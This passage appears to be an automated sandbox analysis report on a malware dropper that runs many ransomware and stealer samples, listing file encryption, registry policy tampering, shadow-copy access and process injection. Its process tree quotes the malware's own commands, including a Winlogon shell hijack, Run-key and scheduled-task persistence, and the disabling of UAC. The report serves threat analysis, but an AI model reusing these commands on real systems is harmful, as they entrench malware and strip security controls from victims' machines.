DC\Reader\WebResources\Resource0\static\images\A12_Spinner_2x.gif.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\new_icons.png.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.40978.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SmallTile.scale-100_contrast-black.png CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\nl\msipc.dll.mui CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ChakraCore.Debugger.dll.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\7-Zip\readme.txt.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.GamingApp_2105.900.24.0_x64__8wekyb3d8bbwe\Assets\Xbox_LargeTile.scale-200_contrast-black.png CoronaVirus.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\jjs.exe.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Grace-ul-oob.xrm-ms.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_US\Excluded.txt AgentTesla.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\ktab.exe.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaTypewriterRegular.ttf CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Retail-pl.xrm-ms CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.40978.0_x64__8wekyb3d8bbwe\Assets\contrast-white\BadgeLogo.scale-400_contrast-white.png CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_21.21030.25003.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-80_altform-unplated_contrast-white.png CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\utilities\lib\selection\Selection.types.js CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\utilities\lib-amd\language.js CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\large_trefoil_2x.png.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ru-ru\ui-strings.js.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\Common.ExcelServices.Resources.dll.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2103.1172.0_x64__8wekyb3d8bbwe\Assets\contrast-white\FeedbackHubAppList.targetsize-24_altform-unplated.png CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\es-es\ui-strings.js CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\de-de\ui-strings.js.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\ja\msipc.dll.mui.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\cs\WindowsBase.resources.dll CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-36.png CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\utilities\lib\test\setRenderSpy.js CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\api-ms-win-core-synch-l1-2-0.dll.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AppSharingChromeHook.dll CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingNews_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\NewsAppList.targetsize-96_altform-lightunplated_contrast-white.png CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_10.0.561.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial3-ppd.xrm-ms CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\Microsoft.Win32.Registry.AccessControl.dll.id-DCDF68A3.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2020.503.58.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\CameraWideTile.scale-125.png CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.40831.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-40.png CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\HxCalendarBadge.scale-125.png CoronaVirus.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\java.security CoronaVirus.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File created C:\Windows\infpub.dat BadRabbit.exe File created C:\Windows\cscc.dat rundll32.exe File created C:\Windows\dispci.exe rundll32.exe File opened for modification C:\Windows\54A.tmp rundll32.exe File opened for modification C:\WINDOWS\Web Krotten.exe File created C:\Windows\perfc rundll32.exe File opened for modification C:\Windows\infpub.dat rundll32.exe File created C:\Windows\perfc.dat NotPetya.exe File opened for modification C:\Windows\perfc.dat rundll32.exe File created C:\Windows\dllhost.dat rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 3276 2844 WerFault.exe 88 9372 6920 WerFault.exe 220 17384 12036 Process not Found 1015 41728 37584 Process not Found 1891 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 InfinityCrypt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString InfinityCrypt.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1008 schtasks.exe 9772 schtasks.exe 26360 SCHTASKS.exe 6348 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 12492 vssadmin.exe -
Kills process with taskkill 11 IoCs
pid Process 6128 taskkill.exe 10600 Process not Found 18424 Process not Found 10736 Process not Found 40784 Process not Found 34104 Process not Found 34396 Process not Found 26384 taskkill.exe 24004 taskkill.exe 3756 taskkill.exe 6700 Process not Found -
Modifies Control Panel 6 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Control Panel\Desktop Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Control Panel\Desktop\WallpaperOriginX = "210" Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Control Panel\Desktop\WallpaperOriginY = "187" Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Control Panel\Desktop\MenuShowDelay = "9999" Krotten.exe Key created \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Control Panel\International Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Control Panel\International\sTimeFormat = "ÕÓÉ" Krotten.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main Krotten.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: ÌÎÉ ÕÓÉ ÏÐÎÒÓÕ À ÏÈÇÄÀ ÃÍÈÅÒ ::::::::::::::::::" Krotten.exe Key created \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Internet Explorer\Main Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: ÌÎÉ ÕÓÉ ÏÐÎÒÓÕ À ÏÈÇÄÀ ÃÍÈÅÒ ::::::::::::::::::" Krotten.exe -
Modifies Internet Explorer start page 1 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/" Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/" Krotten.exe -
Modifies registry class 1 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\REGFILE\SHELL\OPEN\COMMAND Krotten.exe -
Modifies registry key 1 TTPs 15 IoCs
pid Process 6324 reg.exe 9984 reg.exe 5572 reg.exe 2704 reg.exe 3204 reg.exe 3148 reg.exe 27692 reg.exe 25676 reg.exe 12956 reg.exe 9696 reg.exe 11476 reg.exe 4564 reg.exe 23872 reg.exe 33336 reg.exe 22280 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1424 rundll32.exe 1424 rundll32.exe 1424 rundll32.exe 1424 rundll32.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 20272 54A.tmp 20272 54A.tmp 20272 54A.tmp 20272 54A.tmp 20272 54A.tmp 20272 54A.tmp 20272 54A.tmp 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe 4368 CoronaVirus.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 3440 CryptoWall.exe 3204 explorer.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 2440 HawkEye.exe Token: SeShutdownPrivilege 1424 rundll32.exe Token: SeDebugPrivilege 1424 rundll32.exe Token: SeTcbPrivilege 1424 rundll32.exe Token: SeDebugPrivilege 980 DeriaLock.exe Token: SeSystemtimePrivilege 4968 Krotten.exe Token: SeDebugPrivilege 3708 Fantom.exe Token: SeDebugPrivilege 20272 54A.tmp Token: SeSystemtimePrivilege 4968 Krotten.exe Token: SeSystemtimePrivilege 4968 Krotten.exe Token: SeShutdownPrivilege 9724 Petya.A.exe Token: SeShutdownPrivilege 39344 rundll32.exe Token: SeDebugPrivilege 39344 rundll32.exe Token: SeTcbPrivilege 39344 rundll32.exe Token: SeShutdownPrivilege 1156 Cerber5.exe Token: SeCreatePagefilePrivilege 1156 Cerber5.exe Token: SeDebugPrivilege 26384 taskkill.exe Token: SeDebugPrivilege 24004 taskkill.exe Token: SeDebugPrivilege 6944 D01.tmp Token: SeBackupPrivilege 4652 vssvc.exe Token: SeRestorePrivilege 4652 vssvc.exe Token: SeAuditPrivilege 4652 vssvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3184 wrote to memory of 3688 3184 Computer Raper.exe 79 PID 3184 wrote to memory of 3688 3184 Computer Raper.exe 79 PID 3184 wrote to memory of 3688 3184 Computer Raper.exe 79 PID 3184 wrote to memory of 2440 3184 Computer Raper.exe 80 PID 3184 wrote to memory of 2440 3184 Computer Raper.exe 80 PID 3184 wrote to memory of 2440 3184 Computer Raper.exe 80 PID 3184 wrote to memory of 4040 3184 Computer Raper.exe 81 PID 3184 wrote to memory of 4040 3184 Computer Raper.exe 81 PID 3184 wrote to memory of 4040 3184 Computer Raper.exe 81 PID 3184 wrote to memory of 3080 3184 Computer Raper.exe 82 PID 3184 wrote to memory of 3080 3184 Computer Raper.exe 82 PID 3184 wrote to memory of 3080 3184 Computer Raper.exe 82 PID 3184 wrote to memory of 1456 3184 Computer Raper.exe 83 PID 3184 wrote to memory of 1456 3184 Computer Raper.exe 83 PID 3184 wrote to memory of 1456 3184 Computer Raper.exe 83 PID 4040 wrote to memory of 2728 4040 butterflyondesktop.exe 84 PID 4040 wrote to memory of 2728 4040 butterflyondesktop.exe 84 PID 4040 wrote to memory of 2728 4040 butterflyondesktop.exe 84 PID 2440 wrote to memory of 3688 2440 HawkEye.exe 79 PID 2440 wrote to memory of 3688 2440 HawkEye.exe 79 PID 3184 wrote to memory of 4272 3184 Computer Raper.exe 85 PID 3184 wrote to memory of 4272 3184 Computer Raper.exe 85 PID 3184 wrote to memory of 4616 3184 Computer Raper.exe 86 PID 3184 wrote to memory of 4616 3184 Computer Raper.exe 86 PID 3184 wrote to memory of 4616 3184 Computer Raper.exe 86 PID 3184 wrote to memory of 2844 3184 Computer Raper.exe 88 PID 3184 wrote to memory of 2844 3184 Computer Raper.exe 88 PID 3184 wrote to memory of 2844 3184 Computer Raper.exe 88 PID 3184 wrote to memory of 1156 3184 Computer Raper.exe 89 PID 3184 wrote to memory of 1156 3184 Computer Raper.exe 89 PID 3184 wrote to memory of 1156 3184 Computer Raper.exe 89 PID 3184 wrote to memory of 4368 3184 Computer Raper.exe 90 PID 3184 wrote to memory of 4368 3184 Computer Raper.exe 90 PID 3184 wrote to memory of 4368 3184 Computer Raper.exe 90 PID 4616 wrote to memory of 1424 4616 BadRabbit.exe 92 PID 4616 wrote to memory of 1424 4616 BadRabbit.exe 92 PID 4616 wrote to memory of 1424 4616 BadRabbit.exe 92 PID 3184 wrote to memory of 4568 3184 Computer Raper.exe 94 PID 3184 wrote to memory of 4568 3184 Computer Raper.exe 94 PID 3184 wrote to memory of 4568 3184 Computer Raper.exe 94 PID 3184 wrote to memory of 3440 3184 Computer Raper.exe 96 PID 3184 wrote to memory of 3440 3184 Computer Raper.exe 96 PID 3184 wrote to memory of 3440 3184 Computer Raper.exe 96 PID 4568 wrote to memory of 4800 4568 CryptoLocker.exe 97 PID 4568 wrote to memory of 4800 4568 CryptoLocker.exe 97 PID 4568 wrote to memory of 4800 4568 CryptoLocker.exe 97 PID 3184 wrote to memory of 980 3184 Computer Raper.exe 99 PID 3184 wrote to memory of 980 3184 Computer Raper.exe 99 PID 3184 wrote to memory of 980 3184 Computer Raper.exe 99 PID 3440 wrote to memory of 3204 3440 CryptoWall.exe 98 PID 3440 wrote to memory of 3204 3440 CryptoWall.exe 98 PID 3440 wrote to memory of 3204 3440 CryptoWall.exe 98 PID 1424 wrote to memory of 4456 1424 rundll32.exe 101 PID 1424 wrote to memory of 4456 1424 rundll32.exe 101 PID 1424 wrote to memory of 4456 1424 rundll32.exe 101 PID 3204 wrote to memory of 1844 3204 explorer.exe 104 PID 3204 wrote to memory of 1844 3204 explorer.exe 104 PID 3204 wrote to memory of 1844 3204 explorer.exe 104 PID 3184 wrote to memory of 4932 3184 Computer Raper.exe 103 PID 3184 wrote to memory of 4932 3184 Computer Raper.exe 103 PID 3184 wrote to memory of 4932 3184 Computer Raper.exe 103 PID 4456 wrote to memory of 1896 4456 cmd.exe 105 PID 4456 wrote to memory of 1896 4456 cmd.exe 105 PID 4456 wrote to memory of 1896 4456 cmd.exe 105 -
System policy modification 1 TTPs 37 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMyMusic = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu = "1" Krotten.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{450D8FBA-AD25-11D0-98A8-0800361B1103} = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyDocs = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop = "1" Krotten.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "1044" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoUserNameInStartMenu = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoManageMyComputerVerb = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D} = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoToolbarCustomize = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinters = "1" Krotten.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall\NoAddRemovePrograms = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL = "1" Krotten.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyPictures = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoThemesTab = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose = "1" Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinterTabs = "1" Krotten.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 26984 attrib.exe 26964 Process not Found
Processes
-
C:\Users\Admin\AppData\Local\Temp\Computer Raper.exe"C:\Users\Admin\AppData\Local\Temp\Computer Raper.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Users\Admin\AppData\Roaming\AgentTesla.exe"C:\Users\Admin\AppData\Roaming\AgentTesla.exe"2⤵
- Chimera
- Executes dropped EXE
- Drops file in Program Files directory
PID:3688
-
-
C:\Users\Admin\AppData\Roaming\HawkEye.exe"C:\Users\Admin\AppData\Roaming\HawkEye.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2440
-
-
C:\Users\Admin\AppData\Roaming\butterflyondesktop.exe"C:\Users\Admin\AppData\Roaming\butterflyondesktop.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Users\Admin\AppData\Local\Temp\is-7NKUC.tmp\butterflyondesktop.tmp"C:\Users\Admin\AppData\Local\Temp\is-7NKUC.tmp\butterflyondesktop.tmp" /SL5="$60104,2719719,54272,C:\Users\Admin\AppData\Roaming\butterflyondesktop.exe"3⤵
- Executes dropped EXE
PID:2728
-
-
-
C:\Users\Admin\AppData\Roaming\$uckyLocker.exe"C:\Users\Admin\AppData\Roaming\$uckyLocker.exe"2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
PID:3080
-
-
C:\Users\Admin\AppData\Roaming\7ev3n.exe"C:\Users\Admin\AppData\Roaming\7ev3n.exe"2⤵
- Executes dropped EXE
PID:1456 -
C:\Users\Admin\AppData\Local\system.exe"C:\Users\Admin\AppData\Local\system.exe"3⤵
- Executes dropped EXE
PID:12584 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat4⤵PID:10632
-
-
C:\Windows\SysWOW64\SCHTASKS.exeC:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f4⤵
- Creates scheduled task(s)
PID:26360
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵PID:39132
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:645⤵PID:14424
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵PID:39140
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:645⤵PID:14516
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:644⤵PID:39148
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:645⤵PID:14440
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:644⤵PID:39188
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:645⤵PID:14444
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:644⤵PID:39196
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:645⤵PID:14384
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:644⤵PID:39204
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:645⤵PID:14448
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:644⤵PID:10684
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:645⤵PID:36364
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\Annabelle.exe"C:\Users\Admin\AppData\Roaming\Annabelle.exe"2⤵
- Executes dropped EXE
PID:4272
-
-
C:\Users\Admin\AppData\Roaming\BadRabbit.exe"C:\Users\Admin\AppData\Roaming\BadRabbit.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4616 -
